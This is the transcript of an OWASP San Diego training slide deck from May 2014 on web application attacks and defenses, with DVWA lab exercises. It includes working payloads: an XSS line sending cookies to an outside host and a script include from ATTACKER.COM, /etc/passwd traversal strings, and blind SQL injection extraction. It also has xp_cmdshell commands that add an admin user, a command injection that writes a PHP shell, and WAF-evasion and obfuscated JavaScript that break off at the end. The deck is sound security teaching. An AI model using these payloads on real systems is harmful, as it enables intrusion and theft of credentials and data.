owasp san diego training presentation
DESCRIPTION
OWASP San Diego Training Slides from May, 2014TRANSCRIPT
<script>alert(‘OWASP Training’);
</script>
Warning: This Presentation Is Intended For Educational Purposes Only
Setup Web Communication SQL Basics HTTP/HTTPS Overview Tools Other related technologies XSS CSRF URL Redirect Local File Inclusion (LFI) Remote File Inclusion (RFI) Direct Object Access SQL Injection Command Injection Javascript Server Side Injection
Topics
Kali Linux Firefox plugins
◦ Web Developer◦ User-Agent Switcher◦ Firebug◦ SOA Client
Setup Check
Setup https://172.17.0.42/dvwa/
Username: admin Password: *****
Exercise - DVWA Portal
Basic Web Communication
Client → Server
Client sends a request Server sends back a response E.g. Web Browser → Web Server (Port 80)
◦ Web Server → Postgres Database to fetch data⚫Returns data to Web Server to process and render to Web
Browser
Basic Web Communication
Web Request
Basic Web Communication
GET / HTTP/1.1Host: api.bonfire-project.eu:444Accept: */*Authorization: Basic XXXAccept-Encoding: gzip, deflate
Web Response
Basic Web Communication
HTTP/1.1 200 OK Vary: Authorization,Accept Transfer-Encoding: chunked Etag: "fa2ba873343ba638123b7671c8c09998" Content-Type: application/vnd.bonfire+xml; charset=utf-8 Date: Wed, 01 Jun 2011 14:59:30 GMT Server: thin 1.2.11 codename Bat-Shit Crazy Allow: GET,OPTIONS,HEAD Cache-Control: public,max-age=120 Connection: close
<?xml version="1.0" encoding="UTF-8"?> <root xmlns="http://api.bonfire-project.eu/doc/schemas/occi" href="/"> <version>0.8.9</version> <timestamp>1306940370</timestamp> <link rel="experiments" href="/experiments" type="application/vnd.bonfire+xml"/> <link rel="locations" href="/locations" type="application/vnd.bonfire+xml"/> <link rel="users" href="/users" type="application/vnd.bonfire+xml"/> </root>
Example using Burpsuite (Repeater)…
DEMO - Request/Response
GET POST HEAD TRACE PUT DELETE CONNECT OPTIONS
HTTP Methods
100 (Informational) 200 (Success) 300 (Redirect) 400 (Client Error) 500 (Server Error)
HTTP Response Codes
http://www.victim.com/page.aspx?parameter1=test¶meter2=test#location=3
HTTP URI/URL
Database communication
Web Server communicates to DB to fetch data
SQL or a SQL abstraction layer is used SQL = Structured Query Language
Basic Web Communication
Example Relational SQL DB
SELECT INSERT UPDATE DELETE
Types Of SQL Statements
SELECT column_name FROM table_name WHERE column_name=“value” ORDER BY column_name DESC
SELECT “random string” SELECT “random string” FROM DUAL
SeLeCt Price where ISBN_NO = ‘0201703092’;
SELECT Statement
Weak Passwords Open Directories Client Side Security Detailed Error Messages
Insecure Configuration
https://172.17.0.145/Web2/Client-Side Security - Exercise
https://172.17.0.145/CrackGomezsPassword/
Demo…
EXERCISE – Insecure config.
HTTPS Communication
SSL/TLS Versions: SSLv2, SSLv3, TLS1.0, TLS1.1, TLS1.2
Key Exchange Mechanisms: RSA, DH, DHE/EDH, ECDHE, …
Authentication Mechanisms: RSA, … Encryption Algorithms: RC4, DES, AES, IDEA,
SEED, … Encryption Modes: CBC, ECB, GSM, Counter,
…
HTTPS Overview
HTTPS = HTTP over TLSv1.0, TLSv1.2 or SSLv3 * are optional
CLIENT SERVERClientHello -----> [ServerHello Certificate * <----- ServerKeyExchange * CertificateRequest *]Certificate *ClientKeyExchange -----> CertificateVerify *
<----- FinishedApplication Data <-----> Application Data
HTTPS Overview
HTTPS Overview
HTTPS Overview
Burpsuite
Demo/Exercise
Burpsuite
Web Developer Toolbar
Firebug
IE Developer Toolbar (F12)
User Agent Switcher
Download user agent xml list◦ http://techpatterns.com/forums/about304.html
User Agent Switcher
SOA Client
XML HTTP Request (XHR)◦ XML HTTP header
Javascript Serialized Object Notation (JSON)◦ Way of representing data◦ { “Firstname”: “Jake”, “lastname”: “Jones” }
SOAP◦ Look for asmx files or asmx?WSDL◦ Could be server to server or client to server
REST◦ Parameters specified in url◦ If you don’t have documentation you can try and
guess the REST parameters
Other HTTP Related Technologies
Reflected XSS Stored XSS Dom Based XSS
Cross-Site Scripting (XSS)
http://192.168.1.124/WackoPicko/pictures/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0
Reflected XSS can be in POST
Reflected XSS
Can be in user agent Could be in cookie Use to be able to control a lot of HTTP
headers in flash
Reflected XSS
Html and or Javascript is stored on the server and can be later accessed by a user
Stored XSS
User input is gathered by javascript and reflected back to the page
Try exploits with IE (or safari mobile…)
Dom Based XSS
Put canary value in http://victim.com/id=yoyoyo Use web developer toolbar to view
generated source Check to see where the canary is in the
source Check to see if html encoding is being used
or what characters are available◦ http://victim.com/id=yoyoyo<
Sploit if possible
Finding XSS
<script>var+i=new+Image;+i.src="http://192.168.1.120"%2bdocument.cookie;</script>
<SCRIPT SRC=HTTP://ATTACKER.COM/AAA.JS></SCRIPT>
Exploiting XSS Vulns
Host XSS javascript files or resources on Apache Server
Or start python server◦ python –m SimpleHTTPServer
SimpleHTTPServer can be easily wrapped using ssl library in python
Exploiting XSS Vulns
Browser Exploitation Framework (BeEF)
Exploiting XSS Vulns
HTMLEncode All Output Be Careful where user output is placed in
HTML◦ <html>HTML encoding won’t save you
here<script src=http://[user_controled_input]></script></html>
Do NOT write user input into javascript section of page
XSS Defense
https://172.17.0.42/dvwa/ XSS Reflect exercise
EXERCISE - XSS
Request on behalf of attacker https://victim.com/change_password.asp?
username=admin&password=mypassword123
If tokens are not random they can be guessed or bruteforced
CSRF can be in GET or POST
Cross Site Request Forgery (CSRF)
CSRF Tokens◦ Generate random tokens◦ Make sure you check your tokens ☺
CSRF Defense
https://victim.com/login.asp?landing_page=/user.asp
https://victim.com/login.asp?landing_page=http://www.google.com
URL Redirect
If you can’t use http try https If you can’t use http or https try //google.com
URL Redirect
Redirecting to other pages within the site can still be considered a vulnerability
For example, when combining the attack with other attacks like XSS, CSRF, out of band SQL injection, or command injection
https://victim.com/login.aspx?page=user.aspx?param=<script>alert(1)</script>
URL Redirect
URL Redirect can be used to steal session information in the URL by analyzing the refer header
https://victim.com/login?page=http://attacker.com
https://victim.com/login?page=http://attacker.com&jsessionId=AB21CF40A3BD698
URL Redirect
Store location of redirect(s) on the server Create whitelist of possible URLs to redirect
to
URL Redirect
PHP functions ◦ include()◦ include_once()◦ require()◦ require_once()◦ fopen()
Local File Inclusion
../../../../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini ..\..\..\..\..\..\..\..\boot.ini
.././.././.././.././.././../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e
%2e%2fetc%2fpasswd
Local File Inclusion
Typically Java and .NET LFI vulns will not allow access outside of web root folder
Instead of trying ../../../../../../../../../../../etc/passwd first try ../index.jsp or ../../scripta.js
Local File Inclusion
Harden php.ini file and other configuration files
Make sure web directories are not writable Don’t trust user input for file operations
LFI Defense
https://172.17.0.42/dvwa/ File Inclusion exercise
EXERCISE - LFI
Whether to allow the treatment of URLs (like http:// or ftp://) as files.http://victim.com/allow-url-fopenallow_url_fopen = On
Whether to allow include/require to open URLs (like http:// or ftp://) as files.http://victim.com/allow-url-includeallow_url_include = On
Remote File Inclusion
Go straight to file Directory listing helps a lot Can use burp intruder Check robots.txt Dirbuster Burp engagement
Direct Object Access
SQL is standard query language implemented by several organizations
MySQL MSSQL Oracle Postgres DB2
SQL Injection
Error Union Blind Bypass (eg. Authentication Bypass)
Types Of SQL Injection
' " ') ))))))))) ; \' \" -- ' or 1=1 -- ' and 1=2 -- %27 %2527 %22 # /**/ ' waitfor delay '0:0:20'-- '+waitfor+delay+'0:0:20'+-- ' (select sleep(20)) – - ‘ (select pg_sleep(20))-- '/**/(select/**/sleep(20))/**/--%20 or 1=(select benchmark(1000000,MD5(‘A’)))--
convert(varchar,0x7b5d) chr(0xbf).chr(0x27)
Triggering SQL Injection
Places to try when trying to trigger a SQL injection:◦ GET parameters◦ POST parameters◦ HEAD parameters (Blind injection only)◦ Cookie◦ Refer header◦ Agent ID◦ SOAP parameters◦ JSON parameters
Try using Burp to defeat client side (javascript) SQL injection protections
Triggering SQL Injection
admin‘ or 1=1 –- admin‘ or ‘1’=‘1 admin‘/**/or/**/2/**/LiKe/**/2--/**/
SELECT username, password from users WHERE username = ‘admin’ and password = ‘admin’;
SELECT username, password from usersWHERE username = ‘admin‘ or 1=1 –- ’ and password = ‘admin’
SQL Injection Authentication Bypass
https://172.17.0.42/owaspbricks/login-1/ exercise
EXERCISE – SQL Injection Auth. Bypass
https://172.17.0.42/owaspbricks/login-2/ exercise
EXERCISE – SQL Injection Auth. Bypass
https://172.17.0.145/Web1/ exercise
EXERCISE – SQL Injection Auth. Bypass
Errors must be turned on in configuration of database or exceptions in code are not handled properly and are printed back to the user
Goal is to make database throw an error message and print back the error message with valuable data in it
ERROR Based SQL Injection
http://victim.com/showmovies.aspx?name=rad' and 1=0/@@version --
Server Error in '/' Application.Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright © 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: )' to a column of datatype int.Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
ERROR Based SQL Injection
(MSSQL) Get column name http://victim.com/showmovies.aspx?name=rad' having '1'='1WEBUSERS.UserID
Get next column namehttp://victim.com/showmovies.aspx?name=rad' group by UserID having '1'='1WEBUSERS.Username
ERROR Based SQL Injection
Error Based SQLi MySQL
http://victim.com/showmovies.php?name=rad' and ExtractValue(1,CONCAT(0x5c, (SELECT @@version))) --%20
‘ XPATH syntax error: ‘\5.1.41-3ubuntu12.6-log’
ERROR Based SQL Injection
For Oracle Error Based SQL Injection use utl_inaddr.get_host_name() function
http://victim.com/showmovies.jsp?name=rad' and (utl_inaddr.get_host_name((select+sys.database_name+from+dual)))=1 --
ORA-29257: host MOVIE_DATABASE unknownORA-06512: at 'SYS.UTL_INADDR' line 4ORA-06512: at 'SYS.UTL_INADDR' line 35ORA-06512: at line 1
ERROR Based SQL Injection
Sometimes the utl_inaddr.get_host_name() function can produce the following error:◦ ORA-24247: network access denied by
access control list (ACL)
The following technique will work regardless of network restrictions/permissions
(select%201%20from%20dual%20where%201=1%20and%201=length(extractvalue(xmltype('<x/>'),'/$'||(select%20user%20from%20dual))))
ERROR Based SQL Injection
Postgres
http://victim.com/showmovies.do?name=rad' and 1=cast(version() as int)--
ERROR: invalid input syntax for integer “PostgreSQL 8.3.7 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20071124 (Red Hat 4.1.2-42)”
ERROR Based SQL Injection
https://172.17.0.42/dvwa/ → SQL Injection
Demo/Exercise – Errorbased SQL Injection
Find columns◦ ‘ order by 2 --
Find columns that return data◦ ‘ union select 1,2 --
Extract data using column ◦ ‘ union select 1,@@version --
Union Based SQL Injection
https://172.17.0.42/dwa/ → SQL Injection
Demo/Exercise – Unionbased SQL Injection
When entering a sqli trigger you get a generic error or redirect (HTTP 200, 302, 500)
To confirm the sql injection try using a time based delay◦ waitfor delay '0:0:20' -- (MS SQL) ◦ benchmark(100000000, rand()),1) -- (MySQL)◦ select sleep(20) -- (MySQL (version 5.0.12 and later))◦ pg_sleep(20) -- (Postgres)◦ 'a'||Utl_Http.request('http://madeupserver.com') --
(Oracle) ◦ dbms_lock.sleep(20) -- (Oracle (Only DBA, requires
plsql injection and doesn’t work in where clause))
Blind SQL Injection
Examples of confirming SQL Injectionhttp://victim.com/showmovies.aspx?name=rad' waitfor delay '0:0:20' --http://victim.com/showmovies.php?name=rad' or 1= (select sleep(20)) --%20http://victim.com/showmovies.do?name=rad' pg_sleep(20) --http://victim.com/showmovies.jsp?name=rad' 'a'||Utl_Http.request('http://madeupserver.com') --
Blind SQL Injection
Other methods for confirming Blind SQL Injection Try using addition or subtraction
◦ http://victim.com/showmovies.aspx?id=2◦ http://victim.com/showmovies.aspx?id=3-1◦ http://victim.com/showmovies.aspx?id=1%2b1
Try using a comment◦ http://victim.com/showmovies.aspx?name=rad' --◦ http://victim.com/showmovies.aspx?id=1 /**/
Try a percent sign or a statement that evaluates to true and/or false◦ http://victim.com/showmovies.aspx?name=%◦ http://victim.com/showmovies.aspx?name=rad' or 1=1 --◦ http://victim.com/showmovies.aspx?name=rad' and 1=2 --
Try string concatenation◦ (MSSQL) http://victim.com/showmovies.aspx?name=ra'%2b‘d◦ (Oracle) http://victim.com/showmovies.jsp?name=ra'||'d◦ (MySQL) http://victim.com/showmovies.php?name=ra' 'd
Blind SQL Injection
Extracting Data (TRUE or FALSE)http://victim.com/showmovies.aspx?name=rad' ;if is_srvrolemember('sysadmin')=1 waitfor delay '0:0:20'--
http://victim.com/showmovies.aspx?name=rad';if @@version like '%252005%25' waitfor delay '0:0:20' --
Blind SQL Injection
LIKE techniquehttp://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25a%25' waitfor delay '0:0:12'--(TRUE) (contains 'a')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25e%25' waitfor delay '0:0:12'--(TRUE) (contains 'e')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25o%25' waitfor delay '0:0:12'--(TRUE) (contains 'o')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25p%25' waitfor delay '0:0:12'--(TRUE) (contains 'p')
Blind SQL Injection
LIKE technique Continued
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25r%25' waitfor delay '0:0:12'--(TRUE) (contains 'r')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25s%25' waitfor delay '0:0:12'--(TRUE) (contains 's')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25u%25' waitfor delay '0:0:12'--(TRUE) ( contains 'u' )
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25w%25' waitfor delay '0:0:12'--(TRUE) ( contains 'w' )
http://victim.com/search.aspx?id=1';if SYSTEM_USER like '%25_%25' waitfor delay '0:0:12'--(TRUE) ( contains '_' )
(aeoprsuw_)
Blind SQL Injection
LIKE Technique Continuedhttp://victim.com/search.aspx?id=1';if SYSTEM_USER like 'o%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'o')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'ow%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'ow')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owa%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owa')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owas%25 waitfor delay '0:0:12'--(TRUE) ( starts with 'owasp')
Blind SQL Injection
LIKE Technique Continued
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp%25' waitfor delay '0:0:12'--(TRUE) ( starts with 'owasp')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_%25' waitfor delay '0:0:12'--(TRUE) (starts with 'owasp_')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_u%25' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_u')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_us%25' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_us')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_use%25' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_use')
http://victim.com/search.aspx?id=1';if SYSTEM_USER like 'owasp_user' waitfor delay '0:0:12'--(TRUE) (user is 'owasp_user')
Blind SQL Injection
Binary Search Techniquehttp://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <127 waitfor delay'0:0:20'--TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <63 waitfor delay'0:0:20'--FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <95 waitfor delay'0:0:20'--FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <110 waitfor delay'0:0:20'--FALSE
Blind SQL Injection
Binary Search Technique Continued
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <119 waitfor delay'0:0:20'--TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <114 waitfor delay'0:0:20'--TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <112 waitfor delay'0:0:20'--FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) =111 waitfor delay'0:0:20'--TRUE111 (ASCII (DECIMAL))First char is o
Blind SQL Injection
Logical AND (&) Technique (break out the ascii chart)
How logical AND operator works◦ 1 & 1 = 1◦ 1 & 0 = 0◦ 0 & 1 = 0 ◦ 0 & 0 = 0◦ 1100 & 0110 = 0100
This technique will extract one bit at a time (8 requests per byte)
Blind SQL Injection
Ascii Character 'o' is HEX 6F and binary 0110 1111
Since ascii characters are 128 bits long we will AND each character with 128 (1000 0000), 64 (0100 0000), 32 (0010 0000), 16 (0001 0000), 8 (0000 1000), 4 (0000 0100), 2 (0000 0010), 1 (0000 0001)
If we do a logical AND with each bit and delay a certain number of seconds if the result of the logical AND equals 1 then we should get
NO-DELAY, DELAY, DELAY, NO-DELAYDELAY, DELAY, DELAY, DELAY
Blind SQL Injection
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 128=128 waitfor delay'0:0:20'--FALSE (NO-Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 64=64 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 32=32 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 16=16 waitfor delay'0:0:20'--FALSE (NO-Delay)
Blind SQL Injection
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 8=8 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 4=4 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 2=2 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 1=1 waitfor delay'0:0:20'--TRUE (Delay)
Blind SQL Injection
The Logic AND technique will take roughly the same amount of requests on average as the binary search technique. However, the Logical AND technique does not depend on the previous request (ie. The requests are idempotent). This means when using the logical AND technique multiple requests can be made at the same time.
Blind SQL Injection
Inference response based blind SQL Injection
True or False based on the sites response or response data
http://victim.com/search.aspx?id=1' and 1=1 --(no 500)http://victim.com/search.aspx?id=1' and 1=1/0 --(500)
Blind SQL Injection
Oracle timing based SQL Injection (select
'a'||Utl_Http.request('http://madeupserver.com') from dual WHERE (SELECT username FROM all_users WHERE username='DBSNMP') = 'DBSNMP') --
Blind SQL Injection
Heavy Queries
http://victim.com/search.aspx?id=1' and (light query) and (heavy query)
Blind SQL Injection
Demo
Execute commands in MSSQL by using xp_cmdshell
' exec sp_configure 'show advanced options,1 –-' ; RECONFIGURE –- ' exec sp_configure 'xp_cmdshell',1 – ' ; RECONFIGURE -- ' exec master..xp_cmdshell 'net user pwny pwnsauce /ADD' --
' exec master..xp_cmdshell 'net localgroup Administrators pwny /ADD' –
Metasploit and Core Impact both have modules for this that could help speed up exploitation and pivoting on a system
SQL Injection Operating System
MySQL read file from filesystem ◦ select LOAD_FILE('/etc/passwd')
MySQL write file to filesystem◦ select 'this is a test' into outfile '/var/www/test.txt'
SQL Injection Operating System
Parameterized Queries or Prepared Statements
Don’t put user input into Order by clause. Order by clause is not usually supported with parameterized queries◦ ASC and DESC are only two options. You can use if
statement or sort output in javascript◦ Can grab valid table names or values using a
query then check to see if user input matches. Then concatenate with result from query
SQL Injection Defense
https://victim.com/dnslookup.php?dnsentry=google.com
https://victim.com/dnslookup.php?dnsentry=google.com;cat%20%2fetc%2fpasswd
https://victim.com/dnslookup.php?dnsentry=google.com;cat /etc/passwd
https://victim.com/dnslookup.php?dnsentry=blah;&&ls -l
Command Injection
Commands◦ google.com; ping -c 20 localhost◦ google.com & ping -c 20 localhost◦ google.com && ping -c 20 localhost◦ google.com && ping -n 20 localhost◦ google.com && ping -c 20 localhost #◦ google.com && echo ‘<php …system(…)..’ >
/var/www/site/cmd.php
Command Injection
https://172.17.0.42/dvwa/ Command Execution
EXERCISE – Command Injection
Upload a dynamic file (ie. php, asp, aspx, jsp, etc..)
Run the dynamic code by going to the file using a web browser◦ http://victim.com/uploads/shell.php
Arbitrary File Upload
https://172.17.0.42/dvwa/ → Upload Use: https://172.17.0.144/downloads/
EXERCISE – Arbitrary File Upload
Cookie: admin=false Cookie: 139434 Cookie: logged_in=false
Burp Sequencer can be used to identify non random cookie variables
Session Manipulation and Session Hijacking
Padding Oracle Attack POET tool
Session Manipulation and Session Hijacking
http://victim.com/login.php?SESSID=4v0rmq4gosaag63rla631gl5m2
http://victim.com/login.php?SESSID=aaaaaaaaaaaaaaaaaaaaaaaaaa
Send to someone else to automatically set there cookie. Let them login and take over there session
Session Fixation
Node.js Mongodb (NoSQL with javascript engine) CouchDB (NoSQL with javascript engine)
Javascript Server Side Injection
POST/test/ HTTP/1.1Host: 192.168.1.123User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
response.end(‘pwnd’);
Javascript Server Side Injection
response.end(‘<script>alert(1)</script>’);
var fs = require(‘fs’); response.end(fs.readdrSync(‘c:\\’).toString());
var fs = require(‘fs’); response.end(fs.writeFileSync(‘c:\\secret.txt’,’littleSecret’));
require(‘child_process’).spawn(‘c:\\windows\\system32\\calc.exe’);
response.end(‘success’);
Javascript Server Side Injection
NoSQL databases use a key value hashing technique to store data
NoSQL databases are not very strict on what data you can insert
NoSQL databse implementations may or may not implement standard SQL
NoSQL Injection
Try characters one by one in the GET or POST to see if specific characters are blocked
WAFs very often drop your traffic (Burp will usually time out and your browser will show an error)
Instead of ◦ or '1'='1'--
Try◦ Or/**/'2'/**/LiKe/**/'2
Instead of◦ waitfor delay '0:0:20’--
Try ◦ Wait+for+dElay+'0:0:20’--
Defeating IDS/IPS/WAF
Instead of◦ admin
Try◦ char(0x61)%2bchar(0x64)%2bchar(0x6D)
%2bchar(0x69)%2bchar(0x6E) Instead of
◦ ‘ union select password from users --%20 Try
◦ ‘(union(select(password)from(users))--((1))
Defeating IDS/IPS/WAF
Change GET to POST or POST to GET or Use HEAD
Use IPv6 Change IPv4 version header to 5 (IPv5) HTTP Parameter Pollution
◦ http://victim.com/admin.php?userid=1&userid=2⚫ASP concatenates: 1,2⚫PHP takes last occurrence⚫ Java takes first occurrence
Change Content Type◦ Content-Type: multipart/; boundry=0000
⚫ (evasion of ModSecurity CRS)
Defeating IDS/IPS/WAF
There are many ways in a database to do the same thing◦ @@version ◦ version()
◦ select banner from v$version where banner like ‘Oracle%’
◦ select version from v$instance
Defeating IDS/IPS/WAF
Non alphanumeric xss◦ eval("aler"+(!![]+[])[+[]])("xss")◦ window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+
[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
Defeating IDS/IPS/WAF
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+